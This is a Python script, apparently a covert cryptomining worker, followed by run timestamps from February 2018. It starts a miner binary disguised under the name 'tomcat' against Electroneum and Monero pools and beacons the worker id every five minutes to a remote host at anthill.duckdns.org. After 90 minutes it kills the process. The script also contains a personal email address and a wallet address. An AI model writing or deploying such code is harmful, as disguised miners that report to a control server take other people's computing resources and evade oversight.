import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:23:05.808531
#2018-02-17 17:11:03.505146
#2018-02-17 18:59:05.898126
#2018-02-17 20:47:06.217818
#2018-02-17 22:34:01.528925
#2018-02-18 00:17:06.335977
#2018-02-18 02:07:07.093339
#2018-02-18 03:53:06.645191
#2018-02-18 05:39:03.529398
#2018-02-18 07:32:02.168667
#2018-02-18 09:20:03.747307
#2018-02-18 11:06:04.545143
#2018-02-18 12:53:07.119914
#2018-02-18 14:41:03.700727
#2018-02-18 16:30:04.060738
#2018-02-18 18:19:03.335160
#2018-02-18 20:04:07.741346
#2018-02-18 21:51:01.725072
#2018-02-18 23:40:01.370630
#2018-02-19 01:26:05.374830
#2018-02-19 03:14:02.224747
#2018-02-19 04:59:05.355329
#2018-02-19 06:43:07.378079
#2018-02-19 08:34:04.532740
#2018-02-19 10:23:01.536352
#2018-02-19 12:11:05.645189
#2018-02-19 13:58:06.898347
#2018-02-19 15:47:06.256388
#2018-02-19 17:36:05.427537
#2018-02-19 19:23:05.754896
#2018-02-19 21:09:07.560885
#2018-02-19 22:55:08.501766
#2018-02-20 00:39:06.984673
#2018-02-20 02:29:01.988368
#2018-02-20 04:19:06.484353
#2018-02-20 06:03:06.261566
#2018-02-20 07:48:02.227889
#2018-02-20 09:33:01.419748
#2018-02-20 11:16:08.813926
#2018-02-20 13:04:06.703614
#2018-02-20 14:48:06.659944
#2018-02-20 16:27:10.609396
#2018-02-20 18:13:01.685149
#2018-02-20 20:04:08.946768
#2018-02-20 21:50:10.209733
#2018-02-20 23:32:01.493788
#2018-02-21 01:16:05.032267
#2018-02-21 03:04:05.453496
#2018-02-21 04:50:05.728115
#2018-02-21 06:39:05.348041
#2018-02-21 08:26:03.601749
#2018-02-21 10:11:09.221716
#2018-02-21 11:59:07.191119
#2018-02-21 13:49:10.143211
#2018-02-21 15:35:08.818092
#2018-02-21 17:24:08.702944
#2018-02-21 19:13:06.239987
#2018-02-21 20:59:05.587268
#2018-02-21 22:46:01.976627
#2018-02-22 00:34:07.736111
#2018-02-22 02:23:02.056307
#2018-02-22 04:09:07.211334
#2018-02-22 05:54:07.305179
#2018-02-22 07:40:07.985731
#2018-02-22 09:28:03.986966
#2018-02-22 11:14:08.809699
#2018-02-22 13:00:05.488817
#2018-02-22 14:47:07.475043
#2018-02-22 16:33:05.035687
#2018-02-22 18:18:09.837642
#2018-02-22 20:08:07.014016
#2018-02-22 21:55:04.020290
#2018-02-22 23:42:06.594836
#2018-02-23 01:31:02.119179
#2018-02-23 03:18:08.085940
#2018-02-23 05:05:06.666483
#2018-02-23 06:49:04.852531
#2018-02-23 08:41:06.985977
#2018-02-23 10:57:07.158544
#2018-02-23 12:52:07.135818
#2018-02-23 14:35:08.970015
#2018-02-23 16:24:09.221466
#2018-02-23 18:12:01.247913
#2018-02-23 19:56:07.719083
#2018-02-23 21:41:06.572189
#2018-02-23 23:35:07.930083
#2018-02-24 01:24:06.628793
#2018-02-24 03:15:03.184533
#2018-02-24 05:00:08.904227
#2018-02-24 06:50:04.047568
#2018-02-24 08:33:02.139538
#2018-02-24 10:19:01.703288
#2018-02-24 12:14:05.248474
#2018-02-24 14:06:07.650598
#2018-02-24 15:54:05.462616
#2018-02-24 17:43:07.451285
#2018-02-24 19:28:07.672119
#2018-02-24 21:18:04.221027
#2018-02-24 23:56:01.964602
#2018-02-25 04:04:06.792189
#2018-02-25 07:36:07.494739